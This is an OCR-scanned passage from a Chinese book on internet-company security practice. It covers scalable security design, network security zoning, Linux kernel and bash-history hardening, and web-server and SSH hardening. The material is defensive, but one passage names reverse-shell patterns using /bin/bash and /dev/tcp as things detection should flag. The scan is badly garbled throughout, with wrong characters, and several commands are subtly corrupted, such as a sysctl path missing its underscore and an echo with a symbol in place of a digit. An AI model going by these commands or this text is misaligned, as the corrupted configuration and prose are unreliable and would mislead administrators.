就 能 立即 告警 ， 而 不 是 等 入 侵 活动 阶段 性 结束 ， 攻 击 者 装 了 rootkit 才 告 


Fo 


警 。 





5. 伸 缩 性 、 可 水 平 扩 展 


因为 互联 网 的 业务 架构 本 身 追 求 水平 扩 展 ， 所 以 传统 上 支持 几 千 个 
节点 的 产品 ， 如 QRadar、Arcsight 等 在 互联 网 环境 下 基本 无 用 武之 地 。 
不 能 随 业务 增长 而 扩展 的 安全 解决 方案 是 一 个 致命 伤 。 任 何 安全 手段 ， 
无 论 是 VAF、HIDS， 还 是 IPS， 只 要 不 能 水 平 扩展 ， 就 一 定 不 是 好 的 解 


决 方案 。 





6. 文 持 分 布 式 IDC 


互联 网 公司 的 生产 网 络 一 般 是 多 IDC 部 署 ， 传 统 的 单 层 C/S 架 构 往 
往 只 能 解决 一 个 IDC 中 服务 器 集中 管控 的 情况 。 对 于 海量 IDC 规 柑 ， 需 
要 文 持 去 中 心 化 ， 多 级 部 署 ， 解 决 一 系列 的 失效 、 元 余 和 可 用 性 问题 。 


7. 支 持 自动 化 运 维 





服务 器 数量 一 多 ， 不 能 目 动 化 运 维 吏 不 具有 实际 可 操作 性 、 可 维护 
性 。 例 如 10 万 台 服 务 器 的 安全 Agent 如 果 不 能 自动 化 分 发 、 自 动 注册 、 
报告 状态 ， 统 一 策略 推送 ， 那 融会 变 成 灾难 。 


8. 低 性 能 损耗 


安全 解决 方案 理论 上 有 很 多 种 可 能 。 从 架构 设计 的 角度 讲 ， 可 以 
hook 内 核 ， 可 以 hook 库 函数 ， 可 以 hook 运 行 时 容器 ， 可 以 埋 很 多 点 ， 做 
很 多 的 检测 和 限制 ， 或 者 安全 工程 师 可 以 要 求 从 用 户 浏览 器 到 反 向 代理 
到 应 用 服务 器 ， 到 数据 库 的 连接 全 部 走 SSL/TLS 加 密 。 但 实际 上 ， 纯 安 
全 设计 角度 可 行 的 方案 ， 在 现实 中 未 必 可 行 ， 安 全 带 来 的 性 能 损耗 一 
大 ， 业 务 方 就 不 能 接受 ， 最 后 只 能 成 为 理论 上 可 行 但 实际 上 不 可 操作 、 
不 可 落地 的 纸上谈兵 。 











另 一 方面 ， 实 操 层 面 也 有 很 多 性 能 损耗 的 大 敌 ， 例 如 扫 摘 漏洞 的 疏 
虫 朴 到 网 站 负载 严重 增加 ，HIDS 在 上 万 并 发 的 Nginx 服 务 器 上 运行 了 一 
个 netstat 或 lIsof， 服 务 器 瞬间 “ 价 ” 挥 ...... 这 些 都 是 理论 上 没 错 但 实际 上 不 


可 行 的 安全 措施 。 


9. 能 劳 路 则 不 串联 





“分 光 ”“ 劳 路 ?是 互联 网 偶 爱 的 一 种 方式 ， 客 其 原因 是 不 想 对 业务 
逻辑 改动 ， 串 联 型 安全 措施 最 有 可 能 产生 的 问题 是 : 


1) 业务 啊 应 的 延迟 ， 这 种 延迟 没 法 通过 堆 受 扩展 更 多 的 服务 需 来 
解决 。 


2) 误杀 ， 阻 断 了 正常 用 户 的 请 求 。 





3) 对 业务 逻辑 的 影响 ， 因 为 是 串联 ， 业 务 改 动 都 要 受制 于 这 个 安 


全 设备 ， 有 时 候 牵 一 发 动 全 身 。 


10. 业 务 无 感知 





所 谓 业 务 无 感知 就 是 安全 方案 的 落地 尽 可 能 地 对 业务 侧 : 不 断 网 、 
不 改变 拓扑 、 不 改变 业务 逻辑 、 无 性 能 损耗 。 无 颖 集成 有 时 也 是 这 个 意 


FA 


心 No 


11. 去 “信息 孤岛 ” 





传统 解决 方案 中 单个 安全 设备 注重 解决 “自己 的 事 ”。 例 如 IPS 只 关 
注 网 络 而 不 关注 其 他 ， 而 互联 网 环境 下 单 点 的 安全 检测 和 防御 是 不 行 
的 ， 信 息 不 能 封闭 在 一 个 程序 或 设备 中 ， 必 须 可 联动 ， 可 关联 。IOC 的 
襄 恕 必须 在 企业 内 部 做 到 兼容 、 共 至 和 流通 ， 这 也 是 多 维和 纵深 防御 的 


一 个 前 提 。 


12.TCO 可 控 


有 些 商 业 安全 产品 也 许 效果 还 闭合 ， 小 规模 IDC 部 普 可 能 没 太 多 问 
题 ， 而 一 旦 进入 海量 IDC 环 境 ， 即 使 给 大 客户 折扣 价 也 是 个 天 文 数 字 ， 
这 个 数字 甚至 足以 开 几 家 上 二 人 的 安全 公司 。 无 论 如 何 这 种 TCO 的 解决 
方案 都 是 不 可 行 的 ， 跟 业 务 侧 去 IOE 一 样 ， 在 互联 网 行业 ， 这 是 一 个 潜 
规则 而 不 是 明 规则 ，TCO 过 高 的 安全 方案 就 像 吸毒 ， 一 开始 没 感 党 ， 随 














着 IDC 规 模 的 扩大 会 慢 慢 无 法 承受 ， 此 时 再 转型 就 比较 被 动 。 而 商业 产 
品 很 多 功能 其 实 都 是 多 余 的， 实际 环境 简陋 的 东西 往往 很 有 效 ， 这 就 是 
目 研 的 必然 性 。 


第 6 章 ”基础 安全 措施 





不 管 安全 实践 是 多 么 优秀 的 互联 网 公司 ， 其 安全 体系 都 离 不 开 一 些 
看 起 来 不 那么 高 大 上 的 基础 安全 措施 ， 没 有 了 这 些 ， 上 层 那些 大 数据 的 
入 侵 检测 都 如 同 空中 楼 阁 。 之 所 以 能 够 精确 检测 是 因为 在 纵深 防御 中 层 
层 设 卡 ， 只 需要 在 每 个 环节 关注 有 限 的 “点 ”， 也 因此 入 侵 检测 需要 的 履 
mili (RE) 和 检测 层次 (深度 ) 上 随 着 攻击 面 的 缩小 而 大 幅 缩减 ， 提 
高 入 侵 检测 ROI 的 台 是 一 些 看 起 来 不 太 起 眼 的 安全 措施 。 相 反 ， 在 低 效 
的 安全 解决 方案 里 ， 一 个 安全 设备 放 在 链 路 上 要 检测 所 有 的 协议 并 关注 
所 有 的 行为 告警 ， 让 本 来 就 不 够 高 效 的 盒子 疲于奔命 ， 最 后 真正 有 效 的 
告警 被 一 大 堆 误 报 淹没 。 











6.1 安全 域 划分 





安全 域 划分 的 目的 是 将 一 组 安全 等 级 相同 的 计算 机 划 入 同一 个 安全 
域 ， 对 安全 域内 的 计算 机 设置 相同 的 网 络 边 界 ， 在 网 络 边 界 上 以 最 小 权 
限 开 放 对 其 他 安全 域 的 NACL (网 络 访问 控制 策略 )， 使 得 安全 域内 这 
组 计算 机 梭 露 的 风险 最 小 化 ， 在 发 生 攻 击 或 蜂 虫 病毒 等 侵害 时 能 将 威胁 
最 大 化 地 隔离 ， 减 小 域外 事件 对 域内 系统 的 影响 。 











6.1.1 传统 的 安全 域 划分 


图 6-1 是 一 个 典型 的 传统 中 小 型 企业 的 安全 域 划 分 ， 虚 线 表示 网 络 
边界 ， 也 正好 是 一 个 安全 域 。 通 常会 分 出 DMZ 区 和 内 网 ， 在 传统 的 安 
全 域 划 分 中 还 会 通过 硬件 防火 载 的 不 同 端口 来 实现 隔离 。 但 是 如 今 这 种 
方法 越 来 越 多 地 只 适用 于 办 公 网 络 ， 对 于 大 规模 生产 网 络 ， 这 种 方法 可 
能 不 再 适用 。 





图 6-1 传统 安全 域 示 例 


6.1.2 典型 的 Web 服 务 


典型 的 Web 服 务 通常 是 接 入 层 、 应 用 层 、 数 据 层 这 样 的 结构 ， 其 安 
全 域 和 访问 控制 遵循 通用 的 模型 ， 如 图 6-2 所 示 。 
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授权 的 第 三 方 可 通过 SSH 远程 
连接 访问 指定 的 数据 层 资源 P 


其 余 所 有 端口 默认 
阻 断 安全 组 防火 墙 


图 6-2” 亚 蕊 还 Web 服 务 的 安全 组 (ACL) 示例 


这 张 图 源 于 AWS 对 云 平台 的 securitygroup (安全 组 ， 相 当 于 3 层 的 
防火 墙 ACL ) 功能 的 举例 描述 。 其 中 Web 层 是 直接 在 互联 网 上 骏 露 给 用 
户 的 ， 而 应 用 层 不 需要 直接 暴露 在 互联 网 上 ， 它 只 需要 接受 Web 的 请 
求 ， 以 及 能 访问 位 于 更 靠 后 一 层 的 数据 库 层 ， 数 据 库 层 则 只 需要 接受 来 
自 应 用 层 的 请 求 ， 同 时 自己 的 IO 来 自 于 EBS 卷 ， 默 认 这 些 服务 器 都 需要 
接受 管理 员 的 SSH 和 连接， 但 管理 员 并 非 从 互联 网 直接 发 起 连接 ， 而 是 先 
登录 到 保 允 主 机 或 统一 的 运 维 跳板 机 ， 由 此 再 发 起 同 Web 层 、 应 用 层 、 
数据 库 层 的 各 SSH 连 接 ， 如 果 是 使 用 自动 化 运 维 工具 的 场景 ， 则 3 层 的 























服务 器 要 接受 来 自 运 维 管理 平台 (例如 Puppet、SaltStack 服 务 端的 连 
接 ， 这 样 每 层 只 对 外 开放 最 小 端口 ， 除 必要 的 协议 外 默认 全 部 阻止 访 
问 。 





安全 域 划 分 没有 限定 为 一 定 要 划 vlan， 基 于 L3、L4 的 防火 墙 规则 ， 
甚至 NAT 都 可 以 起 到 隅 离 的 作用 。 仅 仅 是 基于 L2 的 划分 比 L3 以 后 的 更 
加 可 徘 一 扩 。 


6.1.3 ”大 型 系统 安全 域 划 分 


Open Stack 有 一 个 API 流 程 图 ， 如 图 6-3 所 示 。 


大 家 觉得 图 6-3 可 以 用 来 做 OpenStack 安 全 域 划分 的 参考 吗 ? 图 示 中 
表明 了 一 些 数据 流 和 引用 关系 ， 但 最 大 的 问题 在 于 没有 标示 出 
OpenStack 各 节点 的 安全 等 级 ， 例 如 租户 资源 池 和 管理 节点 没有 区 分 出 
来 ， 管 理 服务 中 也 有 分 类 分 级 ， 偶 后 端的 和 更 接近 租户 容器 的 应 该 区 分 
开 来 ， 公 共 服 务 类 的 也 应 独立 标示 ， 这 样 才能 从 整体 上 区 分 不 同 的 资源 

服务 器 、 存 储 、 网 络 设备 ) 属于 什么 安全 域 。 





在 大 型 互联 网 服务 中 ， 一 般 可 以 用 图 6-4 来 抽象 表示 对 外 提供 的 服 
务 的 关系 。 当 然 ， 这 只 是 一 个 对 典型 服务 区 域 的 抽象 ， 真 正 的 结构 可 能 
比 图 示 要 庞大 得 多 。 


虚线 部 分 代表 安全 域 的 边界 。 其 实 通俗 一 氮 讲 就 是 个 “ 切 香 糕 ?的 游 
戏 ， 把 不 同 的 业务 “垂直 纵 问 ) 以 及 分 层 的 服务 〈 水 平 横 癌 ) 一 个 个 切 
开 ， 只 在 南北 同 的 API 调 用 上 保留 最 小 权限 的 访问 控制 ， 在 东西 各 如 无 
系统 调用 关系 则 彼此 隔离 。 当 然 ， 这 个 隔离 的 程度 在 不 同 规模 的 网 络 里 
会 不 一 样 ， 小 一 后 的 网 络 可 以 做 到 很 细 ， 但 是 大 型 网 络 如 果 做 得 非常 
细 ， 运 维 工作 量 会 非常 大 ， 当 一 个 网 络 需要 变更 的 时 候 访问 控制 策略 会 
让 人 彻底 歇 菜 。 所 以 具体 实践 上 是 需要 权衡 这 些 方法 的 。 相 同 之 处 在 
于 ， 不 管 网 络 规模 大 和 小 ， 基 本 部 遵从 类 似 的 架构 ， 区 别 只 在 于 粒度 粗 
细 。 如 果 架 构 在 野 下 成 长 的 初期 完全 没有 考虑 这 方面 的 需求 ， 部 是 杂乱 
无 章 的 ， 如 何 做 安全 域 划 分 可 以 参考 一 下 之 前 的 受 协 折 中 集 略 。 
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图 6-3 OpenStack API 流 程 图 








如 果 和 希望 尽 可 能 在 内 网 少 


Bi 


离 ， 有 利于 弹性 网 络 伸缩 ， 


前 提 是 基于 


服务 器 的 单 点 入 侵 检测 和 防护 能 力 比 较 强 。 





图 6-4 互联 网 服务 安全 域 抽象 示例 


6.1.4 生产 网 络 和 办 公 网 络 


这 里 只 介绍 办 公 网 络 和 生产 网 络 连 接 部 分 所 涉及 的 安全 域 问题 ， 如 
图 6-5 所 示 。 对 于 整个 办 公 网 络 的 安全 域 划分 不 在 这 里 讨论 ， 以 后 在 办 
公 网 络 安全 的 章节 里 会 专门 展开 讨论 。 


之 前 提 到 渗透 生产 网 络 可 以 用 社会 工程 学 从 办 公 网 络 绕 一 圈 的 方 
法 ， 加 上 互联 网 公司 的 主 营 业务 就 是 对 生产 网 络 的 频繁 发 布 和 变更 ， 所 
以 才 使 得 运 维 、 产 品 交付 及 测试 环境 需要 “区 别 ? 对 符 。 为 保证 最 大 的 隔 
离 ， 需 要 尽 可 能 地 采取 如 下 几 个 方面 的 措施 : 


.生产 网 络 的 SSH 22 端 口 在 前 端 防火 墙 或 交换 机 上 默认 阻 正 访问 。 





远程 访问 ( 运 维 连接 ) 通过 VPN 或 专线 连接 到 机 房 生 产 网 络 。 





通过 生产 网 络 的 内 网 而 非 外 网 登录 各 服务 露 或 自动 化 运 维 平台 。 


:办公 网 络 中 运 维 环境 、 发 布 源 和 其 他 OA 环境 VLAN 陋 离 。 


虽然 在 同一 个 物理 办 公 地 点 ， 但 运 维 专线 和 办 公 网 络 的 接 入 链 路 
各 目 独 立 。 





为 保证 可 用 性 ， 运 维 专 线 最 好 有 两 条 以 上 且 来 自 不 同 的 ISP， 防 止 
单 链 路 故障 时 无 法 运 维 。 





跳板 机 有 所 有 的 运 维 操作 审计 。 








有 了 这 些 隔离 措施 之 后 ,“ 绕 一 圈 ” 的 渗透 方法 并 非 绝 对 不 可 行 ， 但 
会 难 很 多 。 


参考 资料 : 


“AWS ZA 
+5” https://d0.awsstatic.com/whitepapers/Security/Intro_to_AWS_Security.pd: 


$ 
= 
Q 
= 


= 


互联 网 





a 





a eee 


办 公 网 络 安全 域 划分 


图 6-5 


6.2 ”系统 安全 加 回 








系统 安全 是 所 有 安全 工作 的 第 一 步 ， 这 部 分 内 容 可 以 归 入 安全 基 
线 。 当 然 本 书 这 部 分 并 不 是 完整 的 系统 安全 加 固 方 案 ， 因 为 这 不 是 一 本 
DAN, MMe LRP RB, TAA Be MEM eM 
回 。 市 面 上 的 很 多 加 固 措 施 ， 有 一 半 操 作 是 “不 痛 不 痒 ? 的 ， 既 不 能 说 它 
无 用 ， 也 没 沉 得 对 系统 安全 提升 有 多 大 帮助 。 





6.2.1 Linux 加 





关于 Linux 加 固 的 文章 ， 网 上 已 经 有 很 多 ， 所 以 只 挑 一 些 有 针对 性 
的 反 说 一 下 。 


1. 禁 用 LKM 


之 前 也 提 到 过 在 一 定 程度 上 为 了 规避 类 似 于 knark、adore 这 类 的 
LKM rootkit， 把 入 侵 检测 聚焦 于 用 户 态 : 


#echo 1>/proc/sys/kernel/modules disabled 





也 可 以 使 用 sysctl 命 令 : 


[root@i-naqp5pri ~]# sysctl -w kernel.modules_disabled=1 
kernel.modules_disabled = 


[root@i-naqp5pri ~]# E 





无 论 是 echo 1> 赋 值 还 是 sysctl 的 方法 在 系统 reboot 后 都 会 失效 ， 所 以 
需要 加 入 启动 项 ， 编 辑 /etc/sysctl.conf 文 件 把 相关 项 写 入 。 


当然 ， 上 面 这 些 属于 治标 型 的 方法 ， 不 是 治本 型 的 ， 如 果 入 侵 者 拿 
到 root 后 ， 装 载 内 核 rootkit 重 局 一 次 系统 就 能 开局 LKM 功 能 。 治 本 的 方 
法 是 在 编译 内 核 时 去 挥 LKM 支 持 ， 这 样 相关 代码 就 不 会 编译 进 内 核 : 





#make config 
Loadable module support (可 加 载 模块 支持 ) 


Zg 


Enable loadable module support (CONFIG_MODULES) [Y/n/?] 选择 





或 者 : 





#make menuconfig 





结果 如 图 6-6 所 示 。 


放映 (作为 起 级 用 户 ) 
APE WAE RY) BRG) ASC) PMH 


Linux/x86_64 3.2.65 Kernel Configuration 
anys navigate the menu. <Enter> selects submenus --->. Highlighted letters are hotkeys. Pressing <Y> includes, <N> 
excludes, <M> modularizes features. Press <Esc><Esc> to exit, <?> for Help, </> for Search. Legend: [*] built-in [ ] 
excluded <M> module < > module capable 


-——-s---- IillliŘiilllllll$l$ŘÂŘÂŘiiioooooooosoosoossotssssssssssssssssssssssssssssssiÃįħÂħĂ 


General setup ---> 
ig] Enable loadable module support -> 


| 

| 

| -*- Enable the block layer ---> 

| Processor type and features ---> 

| Power management and ACPI options ---> 
| Bus options (PCI etc.) ---> 

| Executable file formats / Emulations ---> 
| -*- Networking support ---> 

| Device Drivers ---> 

| Firmware Drivers ---> 

| File systems ---> 

| Kernel hacking ---> 

| Security options ---> 

| -*- Cryptographic API ---> 

t v(+) 


<Select> < Help > 





图 6-6 ”Linux 内 核 编译 选项 


采用 治标 型 还 是 治本 型 的 方法 根据 场景 而 定 ， 如 果 确 定 基本 不 会 频 
索 用 到 内 核 模块 功能 ， 可 以 激进 一 点 选择 治本 型 方法 ， 如 果 东 些 机 器 需 
要 经 常 变 更 驱动 ， 保 守 一 点 可 以 选择 治标 型 。 


2. 限 制 /devmem 


新 版 本 的 系统 默认 都 不 再 使 用 /devwkmem 这 个 文件 ， 查 看 /boot 目 录 
下 的 config 文 件 确保 CONFIG_DEVKMEM 设 置 为 “n”: 


[root@i-naqp5pri boot]# cat config- uname -r° | grep DEVKMEM 
# CONFIG_DEVKMEM is not set 


[root@i-naqp5pri boot]# 





CONFIG_STRICT_DEVMEM it A “y”: 


LrootQ1-naqp5pr1 boot]# cat config- uname -Fr | grep DEVMEM 
CONFIG_STRICT_DEVMEM=y 





[root@i-naqp5pri boot]# 


如 果 只 禁用 LKM， 则 phrack 58 Chttp://phrack.org/issues/58/7.html ) 
中 “Linux on-the-fly kernel patching without LKM” 这 篇 文章 提 到 的 通 
过 /dev/kmem&/dev/mem 读 写 全 地 址 空间 的 方法 的 rootkit 仍 然 可 以 在 用 户 
态 实现 内 核 rootkit 的 功能 ， 典 型 的 代表 就 是 suckit， 而 在 使 用 上 述 设 置 后 
suckit 也 会 失效 。 





虽然 不 绝对 ， 但 一 般 情 况 下 可 以 无 视 内核 态 ， 把 入 侵 检 测 聚 焦 于 用 
尸 态 ， 也 束 是 前 面 提 到 的 ， 如 果 要 提高 入 侵 检测 的 效率 ， 束 必须 只 关注 
更 少 的 点 ， 如 宁 头 注 的 点 非常 多 ， 很 容易 和 被 信 息 济 没 。 可 能 也 有 人 会 问 
这 样 做 是 否 有 些 过 激 ， 其 实 还 好 ， 服 务 器 环境 相 比 客户 端 环 境 还 是 有 很 
大 的 不 同 ， 服 务 端 环境 相对 固化 ， 比 如 通常 不 需要 开发 工具 ， 经 常 变 更 
部 分 主要 集中 在 服务 器 软件 的 配置 和 应 用 的 代码 数据 ， 其 余 的 变更 比较 
少 。 而 入 侵 过 程 则 相反 ， 可 能 会 动 到 一 些 运 维 不 经 常 变 更 甚至 不 应 该 变 
更 的 部 分 。 














3. 内 核 参 数 调 整 


源 于 shawn 的 一 篇 加 固 文档 Chttp://drops.wooyun.org/tips/2621 ) A 
统 的 ASLR， 地 址 空间 随机 映射 〈 一 种 缓冲 区 溢出 缓解 机 制 ) ， 局 动 设 
置 为 2: 





kernel. randomize_va_space=2 





/proc/sys/kernel/randomize_va_space 的 值 如 下 : 
0 关闭 ASLR 


1 mmap base、stack、vdso page 将 随机 化 。 这 意味 着 .so 文件 将 被 
加 载 到 随机 地 址 。 链 接 时 指定 了 -pie 选 项 的 可 执行 程序 ， 其 代码 段 加 载 
地 焉 将 被 随机 化 。 配 置 内 核 时 如 采 指 定 了 CONFIG_COMPAT_BRK， 
randomize_va_space 默 认为 1。 此 时 heap 没 有 随机 化 。 


2 在 1 的 基础 上 增加 了 heap 随 机 化 。 配 置 内 核 时 如 果林 
CONFIG_COMPAT_BRK，randomize_va_space 默 认为 2。 


隐藏 内 核 符号 表 ， 局 动 设 置 为 1: 





kernel.kptr_restrict=1 
/proc/sys/kernel/kptr_restrict 





内 存 映 射 最 小 地 址 ， 启 动 设置 为 65536: 





vm/mmap_min_addr=65536 
/proc/sys/vm/mmap_min_addr 





10 年 前 我 写 Linux 系 统 加 固 文 章 时 也 提 到 了 PaX 和 Grsecurity， 安 全 
感 这 个 东西 是 没有 止境 的 ， 实 际 上 目前 除了 Docker 的 公有 云 多 租户 环境 
(私有 云 不 需要 ) ， 一般 情 况 下 也 不 会 选择 这 么 激进 。 更 多 的 还 是 希望 








菏 些 Linux 的 发 行 版 本 中 以 默认 配置 集成 各 种 攻击 缓解 机 制 。 退 一 步 则 
希望 即便 默认 不 开局 ， 但 以 内 核 参 数 等 形式 提供 更 高 保护 级 别 的 选择 
权 。Windows 新 版 本 提供 的 这 方面 的 保护 也 越 来 越 强 ，Linux 应 该 也 会 
有 这 种 趋势 。 


4. 禁 用 NAT 


攻击 者 在 渗透 内 网 时 经 常用 到 的 一 个 技巧 就 是 在 边界 开局 端口 转 
发 ， 这 样 能 提供 一 个 方便 的 途径 访问 内 网 服务 器 ， 所 以 防御 者 要 做 的 就 
是 禁用 IP 转 发 : 


# echo © > /proc/sys/net/ipv4/ip_forward 











当 这 个 值 无 缘 无 故 变 更 为 1 时 ， 说 明 很 可 能 是 出 了 安全 问题 。 


但 有 些 服务 可 能 会 用 到 ， 比 如 需要 网 关 路 由 功能 的 ， 例 如 LVS 提 供 
负载 均衡 ，Docker 也 需要 。 


5.Bash 日 志 
系统 默认 有 一 个 日 志文 件 .bash_history 在 用 户 目录 下 : 


rootQ1-naqppr Cd -ba 
1 root | sone 7387 ADA 20 50: 51 Se _history 





-rw 
[root@i-naqp5pri ~]# | 


打开 ~/.bashrc 文 件 添加 以 下 配置 。 


设置 环境 变量 为 只 读 : 





readonly HISTFILE 
readonly HISTFILESIZE 
readonly HISTSIZE 
readonly HISTCMD 
readonly HISTCONTROL 
readonly HISTIGNORE 





为 history 文 件 添 加 时 间 惟 : 


# export HISTTIMEFORMAT='$F %T ' 


root@debian:~# export HISTTIMEFORMAT='%F %T' 
root@debian:~# history 5 
250 2015-08-09 21:49:19less .bashrc 
251 2015-08-09 22:17:32export HISTTIMEFORMAT='%F%T ' 
252 2015-08-09 22:17:42history 10 


REEN: 





source ~/.bashrc` 





设置 history 文 件 只 能 追加 : 





# chattr +a ~/.bash_history 





对 所 有 可 登录 用 户 的 shell history 全 都 添加 以 上 属性 。 


禁用 其 他 的 shell: 








-/bin/ksh (Kornshell 由 AT&T 由 尔 实验 室 发 展 出 来 的 ， 兼 容 bash) 


-/bin/tcsh 〈 整 合 C Shell， 提 供 更 多 的 功能 


‘/bin/esh 〈 已 经 被 bin/tcsh 所 取代 ) 


‘/bin/zsh 〈 基 于 ksh 发 展 出 来 的 ， 功 能 更 强大 的 shell) 


更 改 HISTFILE 为 其 他 文件 : 





HISTFILE=/usr/local/log/cmd 








并 保留 原 路 径 下 的 .bash_history 文 件 。 





上 面 这 些 配置 其 实 都 只 是 一 些小 技巧 ， 本 意 是 希望 应 总 啊 应 时 有 命 
令 行 记录 ， 能 够 尽 可 能 “省 事 ”"。 很 多 加 固 项 其 实 部 能 绕 过 ， 但 这 个 比较 
低 的 防御 门槛 还 是 会 起 些 作用 : 


“对 Linux 系 统 不 够 熟悉 的 入 侵 者 。 


不 够 < 机 智 * 的 自动 化 日 志清 理工 具 。 


“自动 化 攻击 的 bot 程 序 。 





对 于 高 手 的 入 侵 者 而 言 ， 这 些 措 施 可 能 就 不 太 管 用 了 ， 前 面 提 到 过 
在 安全 防御 的 中 高 阶 一 段 ， 会 逐步 开始 目 己 发 明 轮 子 ， 不 完全 依赖 于 系 
统 提供 的 既 有 机 制 。 


6. 高 级 技巧 





争取 “一 筋 永 逸 ” 地 解决 shell 历 史记 录 的 问题 。 为 什么 如 此 偏爱 命令 
行 记录 呢 ? 因 为 再 优秀 的 入 侵 者 也 要 用 shell， 男 一 方面 对 于 安全 工作 者 
而 言 ， 由 shel 命 令 行 记 录 做 入 侵 分 析 会 简单 很 多 。 高 阶 的 方法 就 是 修改 
shell 本 身 ， 不 依赖 于 内 置 的 HISTFILE， 而 是 对 所 有 执行 过 的 命令 无 差 
别 的 记录 。 

















修改 shell 源 代码 是 一 种 方式 ， 不 过 相 比 之 下 ， 直 接 修 改 libc 可 能 会 
更 加 高 效 。 主 要 涉及 的 对 象 就 是 exec 函 数 族 : 





#include <unistd.h> 

extern char **environ; 

int execl(const char *path, const char *arg, ...); 

int execlp(const char *file, const char *arg, ...); 

int execle(const char *path, const char *arg, ..., char * const envp[]); 
int execv(const char *path, char *const argv[]); 

int execvp(const char *file, char *const argv[]); 

int execve(const char *path, char *const argv[], char *const envp[]); 





修改 以 上 库 函 数 ， 支 持 额 外 的 syslog， 这 样 能 记录 所 有 运行 过 的 程 
序 。 实 际 上 ， 另 外 5 个 函数 都 是 调用 的 execve © 。 





另 一 种 shell 审 计 的 高 级 方式 是 将 shell 的 log 统 一 收集 后 基于 机 器 学 
习 ， 以 算法 学 习 正 常 管理 员 的 shell 命 令 习 惯 ， 而 不 是 以 静态 规则 定义 黑 
白 名 单 。 比 如 公司 的 运 维 人 员 习 惯用 "1s-al" 而 不 是 用 "1s-la? 或 者 "1”， 还 
有 比如 正常 的 管理 员 可 能 不 太 会 去 敲 击 一 些 冷 门 的 命令 ， 如 “whoami”， 
更 不 可 能 用 “xxxxxx|/bin/bash|xxxxxx” 或 “xxxxx/dev/tcpxxxxx” 这 种 反弹 


“用 户 行为 监控 : bash history logging 攻 
防 ”http://0s.51cto.com/art/201102/244661.htm 


6.2.2 ”应 用 配置 加 固 


1. 目 录 权 限 


有 人 句 话 在 安全 图 流传 :“ 可 写 目 录 不 解析 ， 解 析 目 录 不 可 写 ”"， 这 人 句 
话 主要 用 于 对 抗 webshell， 寓 意 为 攻击 者 通过 文件 上 传 漏洞 ， 上 传 
webshell 或 通过 应 用 层 漏洞 (例如 SQL 注 入 ) 在 可 写 目 录 下 写 入 一 个 
webshell 功 能 的 脚本 后 ， 因 为 没有 执行 权限 ， 无 法 通过 webshell 执 行 命 
a, 或 者 当 目 录 有 解析 执行 权限 的 时 候 ， 因 为 没有 写 权限 ， 无 法 在 目录 
下 生成 webshell 的 文件 也 不 能 加 已 有 的 业务 代码 中 写 入 webshell 而 达 不 到 
渗透 的 目的 。 这 个 规则 实际 上 源 于 新 型 编程 语言 诞生 之 前 的 时 代 ， 在 诸 
如 node.js 等 新 兴 语 言 发 展 的 时 候 ， 这 些 规则 可 能 适用 面 会 越 来 越 小 。 




















解析 目录 不 可 写 ， 以 root 用 户 为 例 : 


#chmod 755 /web/root 





如 果 业 务 需 求 部 分 子 目录 要 改 为 777 权 限 ， 则 更 改 目 录 属 主 为 Web 
进程 用 户 : 





#chown nginx: /web/root/childdir 





可 写 目录 不 解析 。 对 于 PHP， 在 Nginx 配 置 文件 中 添加 如 下 配置 ， 
即 可 禁止 log 目 录 执 行 php 脚 本 : 





location ~* 4/data/cgisvr/log/.*\.(php|php5)$ { 
deny all; 
} 





对 于 Java，Tomcat 默 认 解 析 jspx 文 件 格 式 后 经， 若 不 需要 使 用 jspx 文 
件 ， 则 删除 对 jspx 的 解析 ， 具 体操 作为 修改 conf/web.xml 文 件 ， 将 如 下 代 
人 码 注释 掉 。 





<url-pattern>*.jspx</url-pattern> 





2.Web 进 程 以 非 root 运 行 


Web 进 程 以 非 root 权 限 运 行 体 循 了 最 小 权限 原则 ， 假 如 以 root 权 限 运 
行 则 带 来 两 方面 的 问题 : 


:如 果 和 守护 进程 存在 远程 溢出 类 漏洞 ， 则 通过 exploit 攻 击 后 远程 基本 
上 就 能 得 到 : rootshell“#” . 





:如 果 应 用 层 代 码 出 现 漏洞， 所 有 的 脚本 (也 包括 上 传 的 webshell) 
将 直接 以 root 权 限 执行 系统 命令 ， 整 个 入 侵 过 程 无 须 提 权 就 可 以 一 步 到 
位 ， 入 侵 的 途径 平坦 了 很 多 : 





naqpSpri nx]# p f | grep n 
3520 ei 0 May20 ? 
3221 3220 0 may20 


00:02:1 : worker 
toe ae 0 11:59 pts s/1 00:00:00 an one color=auto nginx 
aqp5pr nx]# E 








Nginx 的 master 进 程 默认 以 root 权 限 运行 ， 而 处 理 用 户 数据 的 worker 
井 程 默认 以 Nginx (nobody) 权限 运行 。 


3. 过 小 特定 文件 类 型 





一 些 文件 对 于 正常 用 户 访问 并 不 需要 ， 但 是 扫描 才 喜 欢 ， 渗 透 者 也 
喜欢 人 肉 猜 测 ， 例 如 管理 员 不 小 心 在 Web 目 录 下 留 了 一 个 备份 文件 ， 里 
包含 了 一 个 重要 的 key， 通 过 这 个 key 得 到 了 应 用 后 台 管 理 员 的 权限 ， 攻 
击 者 就 达到 了 目的 。 诸 如 .bak、.log、.zip、.sql 这 些 都 是 正常 访问 的 用 户 
不 需要 的 ， 一般 用 户 体验 做 得 比较 好 的 网 站 会 把 HTTP 404 重 定 问 到 公 
区 或 广告 类 的 友好 界面 ， 对 于 安全 来 说 ， 则 需要 通过 rewrite 规 则 把 攻击 
特征 的 URL 重 定 同 到 我 们 目 己 的 页 面 ， 而 避免 让 攻击 者 下 载 到 不 该 下 载 
的 文件 ， 如 下 所 示 : 











Listen 88; 
server_name 10.13.8.90; 
root /data/softs/dev_tools; 
index admin.html index.htm index.html; 
autoindex on; 
charset utf-8; 
#charset gbk; 
Location / { 


} 


location ~* \.(log|class|inc|bak)$ 
rewrite ^ http://www.xsec.io/ permanent; 





在 这 个 配置 中 : 





location ~* \.(log|class|inc|bak)$ { 
rewrite ^ http://www.xsec.io/ permanent; 





把 .log.class.inc.bak 类 型 的 文件 做 了 重 定 同 。 当 然 ， 有 些 例 如 .inc 不 
能 完全 过 滤 ， 这 些 都 需要 与 运 维 以 及 开发 讨论 一 


Modrewrite 还 可 以 做 很 多 事情 ， 比 如 根据 客户 端 cookie 做 人 机 识 
别 ， 但 是 毕 竞 还 是 有 WAF 这 个 东西 在 ， 所 以 就 不 打算 让 它 承 担 太 多 职 











SSH 是 目前 最 常见 的 远程 访问 之 一 ， 在 生产 网 络 中 占 比率 最 高 ， 一 
般 来 说 需要 几 点 ， 其 余 加 固 项 可 通过 搜索 引擎 参考 网 上 的 文章 。 


使 用 SSH V2， 而 不 是 V1: 


Protocol 2 





A 上 root 远 程 登录 : 


PermitRootLogin no 


6.2.4 ”账号 密码 


